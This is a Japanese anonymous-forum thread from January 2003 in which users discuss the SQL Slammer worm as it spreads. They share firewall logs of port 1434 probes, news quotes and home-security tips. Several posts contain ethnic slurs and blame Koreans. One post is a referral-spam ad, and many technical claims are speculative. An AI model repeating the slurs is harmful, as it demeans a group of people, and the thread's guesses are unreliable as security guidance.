CordRed ﾆﾑﾀﾞ　・・・・

ってか繋がるじゃん。
さっきまで名前解決出来てなかっただけかよ。
http://www.yomiuri.co.jp/00/20030125i213.htm

1433はブロックしてたけど1434はノーチェックだったことについさっき気づいた。
今日一日ずっとやられっぱなしだったって事か。あーあ。

待機しても何もできないだろうけど・・・

テレ東はブラ

>>286
だからそれ、ひろゆきじゃないから。

http://news2.2ch.net/test/read.cgi/newsplus/1043233000/610
610 ：ひろゆき＠焼肉定食φ ★ ：03/01/25 09:12 ID:???
俺が今日からひろゆきだ

>>300
漏れも。何故か繋がるアカウントと繋がらないアカウントがある。

マイクロソフト社製のデータベース管理ソフトってなに？
SQLserver?

まだﾁｮﾝってCRT使ってるんだな（藁

>>318
サムソンがあるだろ。

これか>>292

234 ：. ：02/11/09 15:27 ID:CBhAGCYA
昨日のハングル講座で、ユンソナが「日本の女の子は、グラビアでみんな水着になるけど
韓国では儒教の影響が強いので、考えられない。恥ずかしくないの？」と言っていた
けど、日本人講師に「韓国では５０年代まで、女の人がおっぱい出して歩くのが
あたりまえだったよね？」言われて自爆してた。歴史の浅い未開人ってあんなものか？
ユンソナが思わず頷いて絶句してた様子を皆さんに見せたかったです。

852 名前：みや ◆ljF/o4D3II 投稿日：02/12/12 07:52 ID:XzBFtfvz
跡継ぎを産んだ母親がオッパイを出して外を歩いていたのは本当。
NAVERのヒストリー板に行けばいっぱい証拠写真がある。

チマチョゴリの写真
http://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_13/6000/5978.jpg

>>306
不正進入保護（T)というのが出てくると思います。
ファイヤーウォールのところをクリックして下部メニューを出してみたら。

>>317
管理ソフトつーか・・
ＳＱＬサーバとＡＣＣＥＳＳ

>>318

アタックしてるとこ一つだけ調べたら
Eindhoven University of Technology
って出てきた。
ドイツ経由か？
はるばるご苦労さんだな、
ピンポンダッシュするために日本まで。

どおりで実況板がクソ重かったわけだ…(2 時すぎから)
ウチのネット環境がおかしいのかと思ったよﾊﾞｶﾔﾛｰ(;´Д｀)

>>316
夕方から全然繋がらん。メールも出来ん

まー小泉の丸投げは事実だが。

>>318

サムソンの液晶は糞だからな

画質が・・・日本の液晶の4年前のレベルだ

>>320
期待して写真クリックしたら自爆しますた。

厨房質問でごめん。
そのＳＱＬっていうのをＰＣに入れてなけりゃ問題なし？

Port137にもアクセスが多発しているのですが、この件とは無関係でしょうか？

航空機による要衝特攻を予言した、トムクランシーの「日米開戦」の上巻にも
同じ様な光景を描写（予言？）していたな…

天才エンジニアが、新種ワームでNYの証券取引所を攻撃。
その隙に日本軍がJALでサイパンに進攻するって話。

いまのところ問題なしと思われ。
ただし、同じＬＡＮ内にＳＱＬがいたら、感染する可能性もある。

>>90
ガーン。
まだ、MyJCBにログインできん。
よりによって、今日のお昼に、誰も買わないであろうノートンの購読キーをJCBで買いました。
ちゃんとなってるかな。

ＮＨＫによると韓国とロシアが発信元らしい。
でも、ただ経由してるだけだろうな。
この２つの国に挟まれた国と言えば・・・

違うよ、そのSQLっていうのを、PCに入れとかないと、だめなんだよ！

今137が来てるんだけど

>>328
根拠の無い誹謗は止めろ！
半分位だぞ。残り半分は一応質の悪いレベルの液晶だが現在レベル。
秋葉の某モニター専門店で確かめた。

こうして又、嫌韓房が増えていく・・・









なんと喜ばしいことか！！！！(｀▽´)

>>331
port 137 - 139 は普段から多いから関係ないんじゃないの？

http://www.firstview.com/Korea_shows/Kfall2002_2003/HONG_SUNGWAN/P002.html

ポート１３７に関しては、WINIS関連なので、
それだけならあまり問題ないと思われ。

世界のネット速度が低下

　インターネットの専門家らによると、世界各地でインターネットの
通信速度が米東部時間２５日早朝（日本時間同日夕）から著しく
低下している。ウイルスのような働きをする感染ファイルが急速に拡散、世
界のネット通信網の基幹に悪影響を及ぼしているもようだ。
　専門家は２００１年夏に猛威を振るったウイルス「コードレッド」に
酷似した症状だと警戒している。（ＡＰ）

http://www.sankei.co.jp/news/030125/0125kok101.htm

nimda≠admin
nimda＝nida ..............

citibank つながらん...

ルータ入れてねぁやし多いのか？
ルータ入れてパケット捨てさせろ！
まぁ、ルータ逝くかもね

>>333
返答に感謝

＞総務省インターネット戦略室は「緊急対応が必要という状況判断はしていない」

ふ〜ん。

なんか情報が錯綜してるな。

とりあえず今回の件で被害に会う会わないは別にして、
常にMSアップデートの重要な更新と、各種セキュリティソフトの設定に注意しとけってことだ。
後はウイルスワクチンソフトの常時更新と…この3つやってりゃ特に問題無いだろ。普通は。

>>332
新種と言えば新種だけど、狙ってるのは
既知の対策パッチもすでに出てるセキュリティホールだからなぁ。

色んなとこから1434にご訪問がヽ(´ー｀)ノ
SQLサーバ使ってない一般の端末的には単なるDoSと認識していいんだよね?
DoSって程の数が来る訳でもないけどさ。

モンゴル・・・・！

ＭＳ−ＳＱＬのシェアが激減するなら万々歳だが。

韓国の復旧作業が終わったら田代砲を装備した２ちゃんねらーの大部隊が一斉砲撃(ry

>>328
要するに
サムソン＝マクドナルド
日本製品＝モスバーガーってことか？

思い？

今日の昼１時にゾネアラームを初起動してから
今までずっとつなげっぱなしですが、半日で
３３４回のブロック（うち１０８回は高危険度)
ってなりました。これは多い方なのかな？

でも、この手の話だとパトレイバーになるな。

オシイ星人ﾊﾞﾝｻﾞｰｲ！

>>340>>342
Thx！

ポート１４３４
と５３
が頻繁にアクセスされてるんですが？？

おれんち1434こない・・・・
(´･ω･`)ｼｮﾎﾞｰﾝ

つまりチョンのセキュリティ管理がずさんだったため世界中に迷惑をかけたわけだ。

>>337
ウチは137と1434がリズムよく吠えています。

　もしかしたらゲイツの野郎が新しいＯＳ買わせるために古いＯＳの穴をついた
ワームをばら撒いたのかもよ？　もっともＸＰには最新最悪の穴が発見されたが
な(糞

ダウ平均、激しく下落

>>348
一言で言うと日本は回線が太いので大丈夫でつ。

今日何回も読売にアクセスしたけどなんともなかった。
今また、なんともないよ。

プロバイダによって違うの？

>>364
面白い人ですね。

>>361
プロバイダーが対応しているから

>>349
MSアップデートの重要な更新しかやってないけど、
いままでウィルスにも、クラックにもやられなかった・・。
もちろんルーター無し、ファイアーウォール無し、アンチウィルス無しです。

　 ∧＿∧　　　　　　　　　　　　 　 |ﾄﾞﾝﾄﾞﾝ!!　　　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　（　・∀・）＜開けてないかんな　|ヾ（ﾟ∀ﾟ）ﾉ　ﾄﾞﾝﾄﾞﾝ!!　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　（　　　　）　　　　　　　 　 　　 　 |　 （　　） ))　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　｜ ｜　| 　 　　　　　　　　　　　　|((　<　<　　　　　　　　ｱﾋｬｰﾋｬﾋｬﾋｬﾋｬ!!
　（_＿）＿）　　　　　　　　　　　　　　　　↑
　　↑　　　　　　　　　　　　　　　ぽーとすきゃん
　ぱそこん）

パクス・ロマーナって何だっけ？

2003年1月25日 23:02:48 Unrecognized access from 63.230.18.245:17216 to UDP port 137
2003年1月25日 23:04:12 Unrecognized access from 168.156.116.148:1509 to UDP port 1434
2003年1月25日 23:04:51 Unrecognized access from 194.119.202.241:1407 to UDP port 1434
2003年1月25日 23:07:01 Unrecognized access from 128.59.21.27:3347 to UDP port 1434

ルーターのフィルタリングで
外部からのパケット入力全て拒否しているが大丈夫か・・・

アンチウイルスは入れてもノートンとかは入れてないけど・・・

また激しくなってきた　ほぼ１分おきに来ます
1434と137が3対1ぐらいの割合だね。

>>364
さ　す　が　ゲ　イ　ツ　会　長




なんだかんだ言ってゲイツは尊敬できる

<丶｀∀´>ﾆﾀﾞﾆﾀﾞﾆﾀﾞﾆﾀﾞｧ

>>364
とりあえずMS SQLが何なのかを調べろな

それって確か、ｱﾙｶｲﾀﾞとかﾗﾃﾞｨｿの仕業じゃねぇか？ﾗﾃﾞｨｿがそれぽい話をしてたような

「ミトニック8年ぶりのネット・サーフ祭 」かとおもた

W32.SQLExp.Worm
http://securityresponse.symantec.com/avcenter/venc/data/w32.sqlexp.worm.html
Discovered on: January 24, 2003
Last Updated on: January 25, 2003 05:29:49 AM

これ？

MSNBC速報：土曜未明からインターネットが低速アクセス状態に

FNCも同様のニュースを流していました。

ＳＱＬサーバーなんかを外に晒している奴ってそんなに多いのか？
信じられんな。

あっ本当だノートンのセキュリティあげたらms-sqlがなんと買って出てきた

>>379
やったのはみとにｋｋ

>>377
MS SQLはワームの為に存在するﾆﾀﾞ

>>370
単に気がついていないだけかもよ。

うちはいきなりHDDの中身が滅茶苦茶に入れ替えられた。
ISDNの時代だったけどね。
それに懲りてノートンを入れた。

>>382
中小で、ＩＩＳとＳＱＬを同時にいれて、
しかもＳＱＬのパスワードデフォルトでさらしてるんだよ、きっと。

1433-1434ポートはルータとかで弾いてるのに、なんで感染したのかなぁ。。

　うちには1434が米国のプロヴァイダとＤＩＯＮから来てやがる。件数としては
15分に一回位か。

>>331
ちょっと前に１３７のポートスキャンが流行ったような・・・
１３７〜１３９はとりあえず塞いどいたほうがいいよ

ＮＨＫラジオが、発信元が韓国とロシアと言ってた。
まあ、偽装してるだろうからただの経由地と思うが。

重い・・・

ルーターを突破されるとか
ルーターを踏み台にされるとかは無い？

F-Secure

On January 25th, 2003 a new internet worm "Sapphire" or "Slammer" has been
detected in several parts of the world. The worm generates massive amounts
of traffic, slowing down the internet. The worm only infect Windows 2000 SQL servers.

>>370
アンチウィルス無しでなんで感染してないって分かるの？

マカなら大丈夫かな？

>>373
そのルータは、フィルタを設定しなくても、外からは何も入って来ないよ！

139今日しめますた

>>370
一応言っておくと、重要な更新しててもルータ無し、防火壁無しは無謀。
個人相手でも時々変な外部アクセスあるぞ。

アンチウイルスとパーソナルファイヤウォールorルータは
個人で普通にネットするのでも必須みたいなもんだと思った方がいい。

1434とかって何？意味わからん

マ社

>>372
１）ニュー速＋の記者

２）ローマの栄華　五賢帝時代

ところで・・ほんとNIS2003のファイアウォールの設定の仕方がわからんです。。
オプションから探しても見つかりませんし・・・。

夜くらいからＭＳＮに繋げないんだけど、
いま起こってる事と関係あるのかな…
初心者過ぎて分かんないんだけど…

>>321
不正進入保護ちゅーのがない訳だな。
ま、実は警告は下のやつのチェック入れただけできたのだがな。
祭りに参加できてめちゃくちゃ感謝・・・。

でも、ちょっと不正進入保護が気になる・・・。

>>395
たまにオンラインスキャンで確かめてた。
でも、マジで感染したことないよ。

ｵﾏｴﾗ2ch重くないですか？
いつもより7割くらいの速度しか出てない気がするんだが

Yahooにも出たね。
http://headlines.yahoo.co.jp/hl?a=20030126-00000079-mai-soci
やれやれ。

1433は違うよね。
ちょっと、期待したが。

これで「MSの製品はすべて危険です!今すぐLINUX＋ｵﾗｸﾉﾚに変更しる!」
と騒ぐ香具師が出没するに10000SQL

SQLサーバーのパッチすら当ててない香具師があわててSQLサーバーを
捨てるに20000オラクル

>>400
そういうﾔｼには直接の被害はない。
嵐が過ぎるのを待て。

age

>>370のＰＣは病巣
窓から捨ててください。

GetMoneyでは、毎週送られてくるメールをクリックするだけで、
ポイントがたまる新しいタイプの広告システムを提供してます。
紹介システムが充実していて、うまくいけばけっこういい収入になりますよ！
かなりおすすめです！
http://dietnavi.com/?id=204942

>>400
乱暴に言えば、ﾃﾞｰﾀが通るドアの番号

もう昔だけど、いきなりワープロソフトが勝手に起動した
事があった。カーソルも勝手に動いた。当時はアンチウイルス
しか入れてなかった。
反省して、ファイヤーウオールもルーターも入れますた。
でも、ルーター入れると少しだけど遅くなるね。

>>394
名前がついたようですな

>>337
それ別のワームの仕業、以前騒ぎになったこともある。

>>409
逆
いま稼働しているものを不安定にしたくないから、パッチをいれないことのほうが多い。
ましてＳＱＬからオラクルなんて簡単に以降できないから、現状のＳＱＬが以降するとは
思えない。

１３７番を攻撃されると？

>>414
めっちゃ難しいw

netstat見てるけど何も来ないよ。偽メッセも普通に動いてるし。(ﾟдﾟ)ﾋﾏｰ

>>404
うちは2002なので違うかもしれないけど、NISのウィンドウを開くよね。
で、ウィンドウ左にインターネット状態、ファイアーウォール、プライバシー制御って
縦に並んでいるでしょ。
で、そこのファイアーウォールをクリックすると出てくるよ。

最初に教えてくださった方に多謝。

１４３４とかよくわからんけどとりあえずノートン先生の設定変えたら警告が頻繁にくるようになった

俺は

SQLサーバーのパッチすら当ててない香具師があわててSQLサーバーを
捨てるに30000ﾒﾓ帳

>>401
マハーポー社なつかしいな

で、これ食らったらどうなるの？

>>357
俺、普通につないでてそのくらいくるよ

>>412
ほんとに感染してないってば＾＾；；

糞ＯＳ、糞ソフトを入れてウィルスをまき散らす
バカウィソウーザー、バカウィソウーザー、バカウィソウーザー
ネットのカスども死ね。

ＷＢＳなんか言ってた？

>402
ああそうだ！サンキュ

port 137の攻撃ってなんだよ、自分の所は反応しないぞ。
通過してるのか？
なんか「あいよっ！」って感じで軽く通過してくる１３７の
姿が見えた。鬱・・・。

数日前までは普通に現れた「port1025〜1029」からの
アタックが今日は全く無いな。
発信源の韓国が沈んで攻撃できずっ、てとこですかねぇ。

>>420
http://www.wdic.org/?word=%A5%DD%A1%BC%A5%C8%C8%D6%B9%E6+%3AWDIC

>>402
わしもあまりよくわからんほうなのじゃが
NISなら「状態と設定」から「ファイヤーウォール」押して
「設定」を押す
んで、「カスタムレベル」のボタン押して一番下の「・・・アクセス時に警告」
にチェックを入れたら出てくるようになった。
後はわからん。

( ´_ゝ｀)

>>426
大抵のの人にはあまり関係ない

まぁ、被害が大きくなったのは韓国のセキュリティ管理が甘かったからかもね。
しかし、ネチズンがほとんど割れ物使ってるから復旧できるんだろか？ｗ

今なら北ﾁｮｿが南侵初めても誰にも気づかれないな・・・

>>419
137-139 はウィンドウズならファイルの共有とかプリンタの共有とかが使っている。
ようするに勝手にファイルを持っていかれたり、へんなファイルを置かれるかも

MSのベータサイトにアクセスできネエよ

>>388
感染ルートはルータの設定とは無関係

>>235にしたら激しく反応

TCP？UDP？

今日、ネット対戦のためにポートもＰＦＷも空けてたよ・・・

ＺＯＮＥＡＬＡＲＭじゃダメなの？
タダなんで何か不安ダナ・・・

答えは北にあるとみた（ｷｯﾊﾟﾘ。

王蟲が移動してる・・

大海礁だ！！！

ＳＱＬなんて使うからだよ、ﾒﾓ帳使えよ！

>380
ということは、port137のアタックは別物なのね。
1434だけが本命と。

どっちみち、SQLserverなんか使ってないから関係ないが。

>>437
マジで危機管理の薄さが露呈してしまった彼の国。

「糞ＯＳ、糞ソフトを入れてウィルスをまき散らす
バカウィソウーザー、バカウィソウーザー、バカウィソウーザー
ネットのカスども死ね」

というお約束の煽りが蔓延するに40000ﾏｯｷﾝ


>>418
「不安定にしたくないから、パッチをいれないことのほうが多い。」
住基ネットがそうだという話を聞いたのだが・・・気のせいか？

ウイルス対策ソフトは何も無いんですが大丈夫でしょうか？yahooのadslです

>>438
共有フォルダにパスワード掛けて、プリンタの電源切ってあるが・・・

プリンタやられる事ってあり？

やっぱりサイバーテロみたいなもんだったのか・・・。

http://www.atmarkit.co.jp/fnetwork/netcom/netstat/netstat.html

>夜くらいからＭＳＮに繋げないんだけど、

ためしてみたけど　普通につながるよ

>>390
忠告アリガト。
とりあえずルーターがブロックしているので大丈夫です。

>>422
ぬ！俺が2003だからないのか！！！
でも、ある程度設定変えたら出てくるようになった。
祭り参加マンセー

「ＳＱＬサーバ」のことを「ＳＱＬ」と呼ぶなよなぁ...
「ＩＰアドレス」を「ＩＰ」と呼ぶぐらい恥ずかしいぞ。

>>444
　うちもZONEALARMだけ…パーソナルファイアーウォールで
ただだから使っているけど…不安だな。

だからよぉ、いい加減Windowsなんて糞なOS入れてないでLinaxにしろって

お前等まだ気付かないようだが・・・


　仙　台　は　既　に　消　滅　し　た　ぞ　？

WBSｷﾀｰ

>>452
大量に印刷されたって話は聞いたことあるけどね。

1434ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!
もちろん遮断しますタ！

やたらルーターがチカチカすると思ってルーターのログみたら、
１４３４に大量のパケット漂着…みたい

>>449
自称ＩＴ先進国という驕りが国民の目を曇らせているわけだ。
まったく迷惑な国だ。

うちの1434ポートに来てる相手先のドメイン一覧
jp kr com hu net edu at be us se ch

今日日本の某有名企業で作業をしてたが、夕方からネットワークが全面
ストップしてたよ。なんだか不思議なこともあるものだと帰ってきたら
この騒ぎ。もしかしたら、この会社は仮面○○ン？なんだかコワイ．．．

>>452
あります
勝手に動いてデタラメな印刷したりした例が

>>460
http://news2.2ch.net/test/read.cgi/newsplus/1043391684/
このスレにｶｴﾚ！

ﾚｷﾞｵｿ

５分前にSubSevenがきた

>>460
菜にそれ

重くなってきた

>>459
アンチウィルスとファイアーウォールのセットで1万弱だ。
買っとけ。

今日はwinnyをやめよう。なんとなく不安だ。

こんどは5632っていうのがキマスタ

IDがNHK・・・

>>451
とりあえず Windows Update やっておけや。
それから明日何かウィルスチェッカを買って、あと余裕があればルータも買え。ルータがあると侵入に対しては少し安心だぞ。設定間違えたら意味ないがな。

>>460
Linuxでもセキュリティーホールはありますが？普及率がＷｉｎ
程度なら同じくらいの被害が出るでしょう。

>>450
住基ネットの仕様しらないけど、完全にクローズドだったら別に問題ないと思われ。
そうでなければ大問題。

例えば新たなセキュリティホールが発見されました、このパッチをいれてください！
と言われてパッチをインストールすると、他の攻撃のために使用できないように
設定しておいた機能がデフォルト（標準設定）になってて使用できる状態になってる
ことがある。
すると、最新の攻撃に対応したはずなのに、旧知の攻撃に・・・（ｒｙ

昨日から自分のHPに妙なアクセスが10件くらい来てるんだけど･･･。
アクセス解析で行こうとしても行けない･･･。
これって関係あるの？

>>460
ディストリビューションを三つ以上挙げられないだろお前？
linaxだもんな（藁

玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう
玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう
玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう
玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう
玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう
玲音を好きになりましょう玲音を好きになりましょう玲音を好きになりましょう

やっぱり、何か重いな・・・。

仙台消滅したのかよ！
田舎でよかった・・・

Linuxなら大丈夫だと思ってる香具師は単細胞

>>476
今日ならﾀｲｰﾎの危険はないと言ってみる

>>451
ウイルスバスターなりノートンインターネットセキュリティーの体験版入れてた方がいい

マザボに付いてきたノー�dのＦＷは英語で使いにくくて、ゾネ使用ちう

2003年1月25日 23:21:42 Unrecognized access from 212.69.166.6:2772 to UDP port 1434
2003年1月25日 23:21:52 Unrecognized access from 200.32.106.70:4337 to UDP port 1434
2003年1月25日 23:23:36 Unrecognized access from 206.50.26.205:3779 to UDP port 1434
2003年1月25日 23:26:35 Unrecognized access from 203.194.202.88:1036 to UDP port 1434
2003年1月25日 23:26:40 Unrecognized access from 141.156.195.144:1977 to UDP port 137

まだまだ来てる・・・

　うちはZoneAlermとマザーボードに付いてきたノートン先生。こないだ更新手
続で3,000円ほど払っただけ。もちろん毎週更新確認は忘れない。

http://jbbs.shitaraba.com/news/723/
↑
ウイルス

そろそろデジモンがリアライズしてくるぞ
シャッガイを用意せよ

>>482
妙なってどんなんだよ（ｗ

花が咲いた時点で、我々の負けだったんですよ。

あかん、サブ機が逝ってもた・・
皆さんも気ぃつけてつд`)

仙台ならここにある
ttp://www.getchu.com/soft.phtml?id=17724

>>484

lainﾀﾝ（;´Д｀）ﾊｧﾊｧ

お絵描き掲示板のおえかきすとが変なのもこのせい？

こっちのポート番号じゃなく発信元のポート番号で
port1025〜1029からのって誰か来てる？

>>486
え？仙台から2ch見てる俺は？

てっきりお隣からかと思ったよ

弾幕薄いよ、何やってんの！

今週ノートン入れた

テロなら、月曜日に仕掛けたほうが有効だと思うけど。
株など、インターネット使うやつがおおいし。
土日のセキュリティの緩いときを狙ったのか？

linux なら対処が早いだろう、、たぶん。

コレクターユイのＡＡまだ〜？？

>>502
幽霊は自分が死んだことに気づいていないんだよ
見たいものしか見ないから

関係ないがこのＮ速＋スレッドでいくつかイタズラ投稿で潰されてるのが続いてるね。

今後、世の中はますますネットに依存していくと、
ちょっと強力なワームだのウィルスだのが出てくる度に大混乱・・・。

ってことになるのかなぁ。

確かに2ch、重いような気がする。
いつもは一気に100%になるプログレスバーが30%ぐらいずつ動く。
まぁ祭りに比べると微々たるものかもしれないが。

>>509
シックスセンスかよ

>>495
CGIが、設置されているユーザ（本人）のホームページ領域以
外から呼び出されました。
CGIを実行するには以下のようにしてください。
１．CGIが置かれているユーザのホームページ領域内にHTML
ファイルまたはCGIファイルを置く
２．このHTMLファイルまたはCGIファイルから呼び出す
３．CGIはフルパスで記述する

　　例：<IMG SRC="http://cgi.www5c.biglobe.ne.jp/~***/******.cgi">


仕様のページはこちらをご覧ください。
ｗｗｗ５ｃのＦＡＱはこちらをご覧ください。


これなに？

UDP portっなにすか？

>>501
同じくport1025〜1029来てるよ〜。
あと、port1037、port50952、なんてのもありマス。

西の空が赤い。。。(((;ﾟ◇ﾟ)))

>>506
土日だと感染してもシス管がすぐに対応できない鯖も多いからな。

>>480
いや、もっとひどいのでは? だって初心者はアップデートの方法
わからんでしょう。 RedHat の RedHat NetWork ならGUIがあるから
まだ良いが、 apt しか使えない状態なら初心者はもう終りだろ。
シェルなんて知らないだろうし。

> 総務省インターネット戦略室は「緊急対応が必要という状況判断はしていない」

状況判断はしていないって...
緊急対応は不必要と判断しているわけじゃなくて，状況判断すらしていないんだ．
大笑い．

>>515
ＴＣＰは確実なやりとりをする通信方法←通常のｗｅｂとか
ＵＤＰは途中でパケットが欠損するかもしれない通信方法←ストリーミングビデオとか

イスラム過激派によるサイバーテロの実行テストみたいなもんかな〜
とか考えるのは短絡的すぎるのでやめておきます。

(･∀･)ｲｲ
ファイアフォールのみのソフトってありますか？
ZONE　ALARMはどことなく信用できないんで有料のやつが欲しいのだが

記念ﾊﾟﾋﾟｺ

俺もﾊﾟﾋﾟｺ

今Microsoftのベータサイトアクセスできる？
俺昼間からずっとできない・・・

どうでもいいけど、シェア95%なんてアホな状態が全ての元凶。
しかも、利益率7割なんて信じられん。

こういうのって犯人捕まるのかな？

>>523
ブラックアイス

>>520
どう考えても緊急対応が必要とは考えていないという意味だろ・・・。

>>514
biglobe の仕様を知らんのだが、Referer のチェックしてんじゃないの？

先生のタダ更新があと４日できれちまう。
最新ウイルス情報なしで、果たしてどこまでもつのやら。

ポートのbootps(67)ってなに？

>>514
BBSにｵﾏｴのURLが晒されてると思われ。
(または自分でURLをカキコしたか)

いや、本当、映画みたいな状況になってきたねぇ。

で、総務省が状況を把握すらできていないと。

>>516
port1025〜1029来てるの？
自分の所は来てないんで発信元の韓国があぼーんして
来なくなったって仮説立てたけど、違うみたいだね。

仮に総務省が緊急対応したとして、何かできる事あるの？

>>532
システムの時計戻しても駄目か！

黒氷もどうかと思うが、、、苦笑。

いつも思うが、こういう騒ぎはセキュリティ会社の自作自演の線もないか？
「ほらみたことか」のような態度が許せん。

>>533
DHCP

>>521
ありがとっ
UDPが多いので気になりました。

OutPostのみだけど、兵器だよね？

>>537
無い。

>>523
無料のTinyでええんじゃないかねえ？
金出すならルーター買ったほうがええような。

>>532
体験版に入れ替えれ

>518
シマンテック（米）のタイムスタンプはさっき見たとき午前4時だった
土曜の早朝から気の毒なことだと思ったよ。

winnyで1434に設定したらどーなりまつか？

>532
再インス（ry


嘘です。悪い事言わんから買っとけ。

>>324

大変遅いレスで申し訳ないが、
アイントホーフェンってオランダなのでは・・・？

どうりで上手くネットに繋がらないわけだ。
私はAir-Hでやってて、近所の人たちだいっせいにネットに接続して混み合って
いるのかと思いました。

>>528
さあ? とにかく追い続けるしかないんじゃない?
でも発信元にログが残ってなかったら終りだな。
MS SQL サーバがどう作ってあるかにもよる。

メールサーバーが逝っちゃって大迷惑
大事なメールが来てるのにやばいよ

本日14時32分より2〜3分に一回の頻度でスキャンやらなんやらきてましたが、
23時19分ついにストップしました。恐ろしいです。

しかしサイバーテロ標的は日本から、ってのごとき危機意識だな。総務省よ。

ネットが堅牢なインフラになるってのは幻想かもな。。

今日色々学びました。
１４３４を出るようにノートン設定して・・・
いままで使っていたwinnyを落とした途端に警告がでまくり！
そか・・・winny切ると俺のパソにくるのはみんな警告になるよなぁ。
うむ。学んだ。

>>523
ボクはマカフィーを使用していますが何か？

>>537
祈るの。

テレビニュースでは「日本ではたいした影響は出ていない」って逝ってました。

韓国をﾜﾗてた奴らの顔が音を立ててひきつる・・・
ひとのことは笑えません。

韓国が被害にあったのは当然かも。
彼らと仕事したことがあるが、
彼らとなんらかでやり取りしていると、ウイルスが来る。
駆除対策しているとはおもえない。

>>548
余計なパケを受信するだけ。

>>536
最新だと↓が来てるよ。
01/25 23:32.20 80.255.43.194 port1026

発信元調べたら
HTTP_HOST www.kagoshima-it.go.jp
HTTP_CONNECTION Keep-Alive
HTTP_REFERER http://www.kagoshima-it.go.jp/~nagayosi/php.html

国内だたーよ。

>>550
だね。
「Ei」の綴りで反射的にドイツ語だと思ってしまった。

>>ファイアフォールのみのソフトってありますか？
>>ZONE　ALARMはどことなく信用できないんで有料のやつが欲しいのだが

ＦｉｒｅＷａｌｌ−�T
彼の軍事強国イスラエル製

WindowsMessengerがサイン院できないんだけど、
これも、それのせい？

>>553
メールサーバーが逝っちゃう？

Jan 25 22:07:14 Deny UDP xxxxxx.getnet.net:4077 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:11:44 Deny UDP xxxxxx.199.100.31:4511 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:17:41 Deny UDP xxxxxx.boom.lists.unbeatabledeals.com:3581 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:21:09 Deny UDP xxxxxx.cc.il.us:1214 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:49:20 Deny UDP xxxxxx.21.185.11:1305 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:54:53 Deny UDP xxxxxx.fgg.uni-lj.si:1085 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 22:55:49 Deny UDP xxxxxx.94.19.249:2482 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 23:16:28 Deny UDP xxxxxx.242.110.85.inszoom.com:1044 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 23:17:38 Deny UDP xxxxxx.gtconnect.net:4211 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0
Jan 25 23:19:51 Deny UDP xxxxxx.105.177.118:3626 xxxxxx.ap.plala.or.jp:ms-sql-m in via tun0

いっぱい来るがな。
bugbearのnetbios-nsやcoderedのhttpもうざい。

　　　　　ささやき　いのり　えいしょう　ねんじろ！


　

もう皆さんともお会いできないかも。

>>564
go.jpかよ！

>>531
Referer のチェックって何？馬鹿でｿﾏｿ。

>>534
えっ！？カキコした覚えないです。晒されてるのか〜！なぜに････。

>>523
kerioなんかいいんじゃない。ルールの設定が多少面倒だけど。

>>570
いしのなかにいる！

シマンテックの英語のページでは項目できてたけど、日本のぺーじはまだ。でもシマンテックで
本当に緊急事態になった時はトップの写真がパラボラアンテナに変わるから、それほどの
危機感は持ってないという事か。

>>501

1025*1 1027*1 1028*2 1029*1 1029*2 過去５０本以内でこれだけ来てるよ。

世界で韓国株、空売り攻撃まだですか？

日本はネットに関しては何かと自虐的な事ばかり報道してるけど、
実は世界最高クラスの危機回避システムが構築されてる。
阪神大震災の時、周辺ではほぼ全ての電話が普通になったのだが、IP網はしっかりと使えた。
DTIとかが必死こいてインフラを整備してくれたおかげ。

月曜日あたりに色々と面白い被害が続出しそうだな

>>530
> どう考えても緊急対応が必要とは考えていないという意味だろ・・・。

「状況判断はしていない」んだよ？君は常識がありすぎる．

河童もネットするのか。
すげえな。

>>564鹿児島技術センター？

やっぱり、２チャンがいつもより重いな。

やばい！東京に核がみんｎ

>>579
関東大震災がおきたらあぼーん
大手町や新宿に集中してるからね

プロバイダいまだ復活せず。
-H"代があがる〜。

たった今、ウィルスが添付されたメールが届きました。
メールをプレビューしただけで感染する種類は「クレズ」だそうです。
皆さんお気お付けください。

俺もアッタク受けたらどうしよう・・・

kill wivern.

>>579
DTIはん・・・　エエ、話やなあ(´Д⊂ｸﾞｽﾝ

ていうか月曜の出社が楽しみになりました

マジで彼のＩＴ大国以外はあまり被害がなかったみないだね

'SQL' worm like 'Code Red,' but not as serious
ＣＮＮもあまり深刻じゃなさそうだしＢＢＣも彼の国の被害がニュースですた。

そろそろ，日本に何かが飛んで来る頃だ...

>>567 重くなったり繋がらなくなって慌てて使いだす人殺到のせいかな
>>584 例のスクリプト荒らしがこの板に来てるせいもあるかも。

>>586
いつの話ですか？
大手プロバイダのサーバは、仙台から鹿児島まで、日本全国に分散してますよ。
日本全土が同時に破滅でもしない限り、ネットワークが完全に死ぬことはありません。
重くはなるだろうけど。

1995年にDTIってあったか？IIJの間違い？

>>590
trebor say again

アルティメットOS導入を強く希望。

>>573
リンク元がセットされている環境変数。

>>535
いいじゃん別に
惣無賞が把握できたからって
誰が得する訳でもなし

早く彼の国との海底ケーブル切ってくれよ・・・
K同のﾋﾟｰｺ鳴りまくってるよ・・・

間隔開いてきてないか？

日本は今度の月曜が企業に被害でるのではないか

>>598
I say again. Kill wivern.

アッタクって何だよ
アタックね

南極の巨大兵器が動きだした。

また来はじめたな。

ちょっと重いな

　今　日　と　明　日　は　多　く　の　
　　企　業　が　お　休　み　な　の　で　
　日　本　で　は　騒　い　で　い　な　い　
　　だ　け　な　ん　で　す　

>>600
環境変数って余計ムズイよ(ﾜﾗﾀ

>>596はＤＮＳの概念から勉強しとけ

